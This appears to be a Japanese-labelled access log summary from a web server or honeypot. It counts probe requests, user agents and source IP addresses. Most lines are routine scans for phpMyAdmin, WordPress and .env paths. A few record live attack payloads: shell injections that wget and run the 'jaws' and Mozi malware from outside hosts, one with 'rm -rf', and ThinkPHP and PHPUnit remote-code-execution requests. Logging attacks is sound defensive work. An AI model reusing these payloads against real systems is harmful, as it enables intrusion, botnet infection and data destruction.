18 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
238 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
1 Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
1 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
2 Mozilla/5.0 zgrab/0.x

リクエスト内容一覧

件数 Method Request Protocol
1 MGLNDD_132.145.66.34_80\n
1 \x03
1 \x16\x03\x01
1 GET /.env HTTP/1.1
2 GET /1phpmyadmin/index.php?lang=en HTTP/1.1
1 GET /2018/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /2019/wp-includes/wlwmanifest.xml HTTP/1.1
2 GET /2phpmyadmin/index.php?lang=en HTTP/1.1
2 GET /MyAdmin/index.php?lang=en HTTP/1.1
2 GET /PMA/index.php?lang=en HTTP/1.1
2 GET /_phpMyAdmin/index.php?lang=en HTTP/1.1
2 GET /_phpmyadmin/index.php?lang=en HTTP/1.1
2 GET /_phpmyadmin_/index.php?lang=en HTTP/1.1
1 GET /ab2g HTTP/1.1
1 GET /ab2h HTTP/1.1
1 GET /actuator/health HTTP/1.1
2 GET /admin/db/index.php?lang=en HTTP/1.1
2 GET /admin/index.php?lang=en HTTP/1.1
2 GET /admin/phpMyAdmin/index.php?lang=en HTTP/1.1
2 GET /admin/phpmyadmin/index.php?lang=en HTTP/1.1
2 GET /admin/pma/index.php?lang=en HTTP/1.1
2 GET /admin/sqladmin/index.php?lang=en HTTP/1.1
2 GET /admin/sysadmin/index.php?lang=en HTTP/1.1
2 GET /admin/web/index.php?lang=en HTTP/1.1
2 GET /administrator/PMA/index.php?lang=en HTTP/1.1
2 GET /administrator/admin/index.php?lang=en HTTP/1.1
2 GET /administrator/db/index.php?lang=en HTTP/1.1
2 GET /administrator/phpMyAdmin/index.php?lang=en HTTP/1.1
2 GET /administrator/phpmyadmin/index.php?lang=en HTTP/1.1
2 GET /administrator/pma/index.php?lang=en HTTP/1.1
2 GET /administrator/web/index.php?lang=en HTTP/1.1
1 GET /blog/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /cms/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /config/getuser?index=0 HTTP/1.1
2 GET /database/index.php?lang=en HTTP/1.1
2 GET /db/db-admin/index.php?lang=en HTTP/1.1
2 GET /db/dbadmin/index.php?lang=en HTTP/1.1
2 GET /db/dbweb/index.php?lang=en HTTP/1.1
2 GET /db/index.php?lang=en HTTP/1.1
2 GET /db/myadmin/index.php?lang=en HTTP/1.1
2 GET /db/phpMyAdmin-3/index.php?lang=en HTTP/1.1
2 GET /db/phpMyAdmin-4/index.php?lang=en HTTP/1.1
2 GET /db/phpMyAdmin-5/index.php?lang=en HTTP/1.1
2 GET /db/phpMyAdmin/index.php?lang=en HTTP/1.1
2 GET /db/phpMyAdmin3/index.php?lang=en HTTP/1.1
2 GET /db/phpmyadmin/index.php?lang=en HTTP/1.1
2 GET /db/phpmyadmin3/index.php?lang=en HTTP/1.1
2 GET /db/phpmyadmin4/index.php?lang=en HTTP/1.1
2 GET /db/phpmyadmin5/index.php?lang=en HTTP/1.1
2 GET /db/webadmin/index.php?lang=en HTTP/1.1
2 GET /db/webdb/index.php?lang=en HTTP/1.1
2 GET /db/websql/index.php?lang=en HTTP/1.1
2 GET /dbadmin/index.php?lang=en HTTP/1.1
2 GET /favicon.ico HTTP/1.1
1 GET /hudson HTTP/1.1
1 GET /media/wp-includes/wlwmanifest.xml HTTP/1.1
2 GET /myadmin/index.php?lang=en HTTP/1.1
2 GET /mysql-admin/index.php?lang=en HTTP/1.1
2 GET /mysql/admin/index.php?lang=en HTTP/1.1
2 GET /mysql/db/index.php?lang=en HTTP/1.1
2 GET /mysql/dbadmin/index.php?lang=en HTTP/1.1
2 GET /mysql/index.php?lang=en HTTP/1.1
2 GET /mysql/mysqlmanager/index.php?lang=en HTTP/1.1
2 GET /mysql/pMA/index.php?lang=en HTTP/1.1
2 GET /mysql/pma/index.php?lang=en HTTP/1.1
2 GET /mysql/sqlmanager/index.php?lang=en HTTP/1.1
2 GET /mysql/web/index.php?lang=en HTTP/1.1
2 GET /mysqladmin/index.php?lang=en HTTP/1.1
2 GET /mysqlmanager/index.php?lang=en HTTP/1.1
1 GET /news/wp-includes/wlwmanifest.xml HTTP/1.1
2 GET /php-my-admin/index.php?lang=en HTTP/1.1
2 GET /php-myadmin/index.php?lang=en HTTP/1.1
2 GET /phpMyAdmin-3/index.php?lang=en HTTP/1.1
2 GET /phpMyAdmin-4.9.7/index.php?lang=en HTTP/1.1
2 GET /phpMyAdmin-4/index.php?lang=en HTTP/1.1
2 GET /phpMyAdmin-5.1.0/index.php?lang=en HTTP/1.1
2 GET /phpMyAdmin-5.1.1/index.php?lang=en HTTP/1.1
2 GET /phpMyAdmin-5.1.2/index.php?lang=en HTTP/1.1
2 GET /phpMyAdmin-5.1.3/index.php?lang=en HTTP/1.1
2 GET /phpMyAdmin-5.2.0/index.php?lang=en HTTP/1.1
2 GET /phpMyAdmin-5/index.php?lang=en HTTP/1.1
2 GET /phpMyAdmin/index.php?lang=en HTTP/1.1
2 GET /phpMyAdmin1/index.php?lang=en HTTP/1.1
2 GET /phpMyAdmin2/index.php?lang=en HTTP/1.1
2 GET /phpMyAdmin3/index.php?lang=en HTTP/1.1
2 GET /phpMyAdmin4/index.php?lang=en HTTP/1.1
2 GET /phpMyAdmin5.1/index.php?lang=en HTTP/1.1
2 GET /phpMyAdmin5.2/index.php?lang=en HTTP/1.1
2 GET /phpMyAdmin5/index.php?lang=en HTTP/1.1
2 GET /phpMyAdmin_/index.php?lang=en HTTP/1.1
2 GET /phpMyadmin/index.php?lang=en HTTP/1.1
2 GET /phpmy-admin/index.php?lang=en HTTP/1.1
2 GET /phpmy/index.php?lang=en HTTP/1.1
2 GET /phpmyAdmin/index.php?lang=en HTTP/1.1
2 GET /phpmyadmin/index.php?lang=en HTTP/1.1
2 GET /phpmyadmin1/index.php?lang=en HTTP/1.1
2 GET /phpmyadmin2/index.php?lang=en HTTP/1.1
2 GET /phpmyadmin2011/index.php?lang=en HTTP/1.1
2 GET /phpmyadmin2012/index.php?lang=en HTTP/1.1
2 GET /phpmyadmin2013/index.php?lang=en HTTP/1.1
2 GET /phpmyadmin2014/index.php?lang=en HTTP/1.1
2 GET /phpmyadmin2015/index.php?lang=en HTTP/1.1
2 GET /phpmyadmin2016/index.php?lang=en HTTP/1.1
2 GET /phpmyadmin2017/index.php?lang=en HTTP/1.1
2 GET /phpmyadmin2018/index.php?lang=en HTTP/1.1
2 GET /phpmyadmin2019/index.php?lang=en HTTP/1.1
2 GET /phpmyadmin2020/index.php?lang=en HTTP/1.1
2 GET /phpmyadmin2021/index.php?lang=en HTTP/1.1
2 GET /phpmyadmin2022/index.php?lang=en HTTP/1.1
2 GET /phpmyadmin3/index.php?lang=en HTTP/1.1
2 GET /phpmyadmin4/index.php?lang=en HTTP/1.1
2 GET /phpmyadmin5/index.php?lang=en HTTP/1.1
2 GET /phpmyadmin_/index.php?lang=en HTTP/1.1
2 GET /phppma/index.php?lang=en HTTP/1.1
2 GET /pma/index.php?lang=en HTTP/1.1
2 GET /program/index.php?lang=en HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+jx[.]qingdaosheng[.]com/jaws;sh+/tmp/jaws HTTP/1.1
1 GET /shop/wp-includes/wlwmanifest.xml HTTP/1.1
2 GET /shopdb/index.php?lang=en HTTP/1.1
1 GET /site/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /sito/wp-includes/wlwmanifest.xml HTTP/1.1
2 GET /sql/myadmin/index.php?lang=en HTTP/1.1
2 GET /sql/php-myadmin/index.php?lang=en HTTP/1.1
2 GET /sql/phpMyAdmin/index.php?lang=en HTTP/1.1
2 GET /sql/phpMyAdmin2/index.php?lang=en HTTP/1.1
2 GET /sql/phpmanager/index.php?lang=en HTTP/1.1
2 GET /sql/phpmy-admin/index.php?lang=en HTTP/1.1
2 GET /sql/phpmyadmin3/index.php?lang=en HTTP/1.1
2 GET /sql/phpmyadmin4/index.php?lang=en HTTP/1.1
2 GET /sql/phpmyadmin5/index.php?lang=en HTTP/1.1
2 GET /sql/sql-admin/index.php?lang=en HTTP/1.1
2 GET /sql/sql/index.php?lang=en HTTP/1.1
2 GET /sql/sqladmin/index.php?lang=en HTTP/1.1
2 GET /sql/sqlweb/index.php?lang=en HTTP/1.1
2 GET /sql/webadmin/index.php?lang=en HTTP/1.1
2 GET /sql/webdb/index.php?lang=en HTTP/1.1
2 GET /sql/websql/index.php?lang=en HTTP/1.1
2 GET /sqlmanager/index.php?lang=en HTTP/1.1
1 GET /stalker_portal/server/tools/auth_simple.php HTTP/1.1
1 GET /test/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /web/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /website/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /wordpress/wp-includes/wlwmanifest.xml HTTP/1.1
2 GET /wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php?lang=en HTTP/1.1
1 GET /wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /wp/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /wp1/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /wp2/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /xmlrpc.php?rsd HTTP/1.1
2 GET http[:]//example[.]com/ HTTP/1.1
1 POST /HNAP1/ HTTP/1.0
1 PRI * HTTP/2.0
Location:SG

送信元IPアドレス一覧

件数 送信元IPアドレス
119 14.198.57.191 Hong Kong
1 34.215.167.244 United States
2 45.61.188.169 United States
1 45.148.10.81 Romania
10 51.79.29.48 Canada
1 51.143.5.58 United Kingdom
4 94.75.218.185 Netherlands
1 125.47.83.27 China
1 137.184.113.41 United States
1 137.184.126.182 United States
2 157.230.216.203 United States
3 161.35.188.242 United States
1 162.142.125.211 United States
1 167.248.133.47 United States
1 172.245.189.10 United States
10 180.101.98.16 China
1 180.149.125.163 Mongolia
8 185.254.196.223 Ukraine
1 192.241.208.234 United States
1 192.241.212.113 United States
1 192.241.213.5 United States
2 193.56.29.120 United Kingdom
1 193.124.7.9 Czechia
2 198.23.200.83 United States
1 198.23.219.111 United States
1 198.235.24.155 United States
1 198.235.24.161 United States
1 206.189.224.36 United States

UserAgent一覧

件数 UserAgent
13 -
5 Go-http-client/1.1
2 Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
2 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
119 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
1 Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
9 Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
25 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
2 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
2 Mozilla/5.0 zgrab/0.x

リクエスト内容一覧

件数 Method Request Protocol
1 27;wget%20http[:]//%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0
1 MGLNDD_13.67.44.234_80
3 \x16\x03\x01
3 CONNECT api[.]ipify[.]org:443 HTTP/1.1
1 CONNECT leakix[.]net:443 HTTP/1.1
28 GET /.env HTTP/1.1
1 GET /1phpmyadmin/index.php?lang=en HTTP/1.1
1 GET /2phpmyadmin/index.php?lang=en HTTP/1.1
1 GET /MyAdmin/index.php?lang=en HTTP/1.1
1 GET /PMA/index.php?lang=en HTTP/1.1
1 GET /TP/html/public/index.php HTTP/1.1
1 GET /TP/index.php HTTP/1.1
1 GET /TP/public/index.php HTTP/1.1
1 GET /_phpMyAdmin/index.php?lang=en HTTP/1.1
1 GET /_phpmyadmin/index.php?lang=en HTTP/1.1
1 GET /_phpmyadmin_/index.php?lang=en HTTP/1.1
1 GET /ab2g HTTP/1.1
1 GET /ab2h HTTP/1.1
1 GET /actuator/health HTTP/1.1
1 GET /admin/db/index.php?lang=en HTTP/1.1
1 GET /admin/index.php?lang=en HTTP/1.1
1 GET /admin/phpMyAdmin/index.php?lang=en HTTP/1.1
1 GET /admin/phpmyadmin/index.php?lang=en HTTP/1.1
1 GET /admin/pma/index.php?lang=en HTTP/1.1
1 GET /admin/sqladmin/index.php?lang=en HTTP/1.1
1 GET /admin/sysadmin/index.php?lang=en HTTP/1.1
1 GET /admin/web/index.php?lang=en HTTP/1.1
1 GET /administrator/PMA/index.php?lang=en HTTP/1.1
1 GET /administrator/admin/index.php?lang=en HTTP/1.1
1 GET /administrator/db/index.php?lang=en HTTP/1.1
1 GET /administrator/phpMyAdmin/index.php?lang=en HTTP/1.1
1 GET /administrator/phpmyadmin/index.php?lang=en HTTP/1.1
1 GET /administrator/pma/index.php?lang=en HTTP/1.1
1 GET /administrator/web/index.php?lang=en HTTP/1.1
2 GET /config/getuser?index=0 HTTP/1.1
1 GET /database/index.php?lang=en HTTP/1.1
1 GET /db/db-admin/index.php?lang=en HTTP/1.1
1 GET /db/dbadmin/index.php?lang=en HTTP/1.1
1 GET /db/dbweb/index.php?lang=en HTTP/1.1
1 GET /db/index.php?lang=en HTTP/1.1
1 GET /db/myadmin/index.php?lang=en HTTP/1.1
1 GET /db/phpMyAdmin-3/index.php?lang=en HTTP/1.1
1 GET /db/phpMyAdmin-4/index.php?lang=en HTTP/1.1
1 GET /db/phpMyAdmin-5/index.php?lang=en HTTP/1.1
1 GET /db/phpMyAdmin/index.php?lang=en HTTP/1.1
1 GET /db/phpMyAdmin3/index.php?lang=en HTTP/1.1
1 GET /db/phpmyadmin/index.php?lang=en HTTP/1.1
1 GET /db/phpmyadmin3/index.php?lang=en HTTP/1.1
1 GET /db/phpmyadmin4/index.php?lang=en HTTP/1.1
1 GET /db/phpmyadmin5/index.php?lang=en HTTP/1.1
1 GET /db/webadmin/index.php?lang=en HTTP/1.1
1 GET /db/webdb/index.php?lang=en HTTP/1.1
1 GET /db/websql/index.php?lang=en HTTP/1.1
1 GET /dbadmin/index.php?lang=en HTTP/1.1
1 GET /elrekt.php HTTP/1.1
1 GET /html/public/index.php HTTP/1.1
1 GET /index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 HTTP/1.1
1 GET /index.php HTTP/1.1
1 GET /myadmin/index.php?lang=en HTTP/1.1
1 GET /mysql-admin/index.php?lang=en HTTP/1.1
1 GET /mysql/admin/index.php?lang=en HTTP/1.1
1 GET /mysql/db/index.php?lang=en HTTP/1.1
1 GET /mysql/dbadmin/index.php?lang=en HTTP/1.1
1 GET /mysql/index.php?lang=en HTTP/1.1
1 GET /mysql/mysqlmanager/index.php?lang=en HTTP/1.1
1 GET /mysql/pMA/index.php?lang=en HTTP/1.1
1 GET /mysql/pma/index.php?lang=en HTTP/1.1
1 GET /mysql/sqlmanager/index.php?lang=en HTTP/1.1
1 GET /mysql/web/index.php?lang=en HTTP/1.1
1 GET /mysqladmin/index.php?lang=en HTTP/1.1
1 GET /mysqlmanager/index.php?lang=en HTTP/1.1
1 GET /php-my-admin/index.php?lang=en HTTP/1.1
1 GET /php-myadmin/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin-3/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin-4.9.7/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin-4/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin-5.1.0/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin-5.1.1/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin-5.1.2/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin-5.1.3/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin-5.2.0/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin-5/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin1/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin2/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin3/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin4/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin5.1/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin5.2/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin5/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin_/index.php?lang=en HTTP/1.1
1 GET /phpMyadmin/index.php?lang=en HTTP/1.1
1 GET /phpmy-admin/index.php?lang=en HTTP/1.1
1 GET /phpmy/index.php?lang=en HTTP/1.1
1 GET /phpmyAdmin/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin1/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2011/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2012/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2013/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2014/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2015/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2016/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2017/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2018/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2019/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2020/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2021/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2022/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin3/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin4/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin5/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin_/index.php?lang=en HTTP/1.1
1 GET /phppma/index.php?lang=en HTTP/1.1
1 GET /pma/index.php?lang=en HTTP/1.1
1 GET /portal/redlion HTTP/1.1
1 GET /program/index.php?lang=en HTTP/1.1
1 GET /public/index.php HTTP/1.1
1 GET /shopdb/index.php?lang=en HTTP/1.1
1 GET /sql/myadmin/index.php?lang=en HTTP/1.1
1 GET /sql/php-myadmin/index.php?lang=en HTTP/1.1
1 GET /sql/phpMyAdmin/index.php?lang=en HTTP/1.1
1 GET /sql/phpMyAdmin2/index.php?lang=en HTTP/1.1
1 GET /sql/phpmanager/index.php?lang=en HTTP/1.1
1 GET /sql/phpmy-admin/index.php?lang=en HTTP/1.1
1 GET /sql/phpmyadmin3/index.php?lang=en HTTP/1.1
1 GET /sql/phpmyadmin4/index.php?lang=en HTTP/1.1
1 GET /sql/phpmyadmin5/index.php?lang=en HTTP/1.1
1 GET /sql/sql-admin/index.php?lang=en HTTP/1.1
1 GET /sql/sql/index.php?lang=en HTTP/1.1
1 GET /sql/sqladmin/index.php?lang=en HTTP/1.1
1 GET /sql/sqlweb/index.php?lang=en HTTP/1.1
1 GET /sql/webadmin/index.php?lang=en HTTP/1.1
1 GET /sql/webdb/index.php?lang=en HTTP/1.1
1 GET /sql/websql/index.php?lang=en HTTP/1.1
1 GET /sqlmanager/index.php?lang=en HTTP/1.1
1 GET /stalker_portal/server/tools/auth_simple.php HTTP/1.1
1 GET /thinkphp/html/public/index.php HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php?lang=en HTTP/1.1
1 GET http[:]//api[.]ipify[.]org/ HTTP/1.1
2 GET http[:]//example[.]com/ HTTP/1.1
1 POST /index.php?s=captcha HTTP/1.1
2 PRI * HTTP/2.0
1 PUT /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1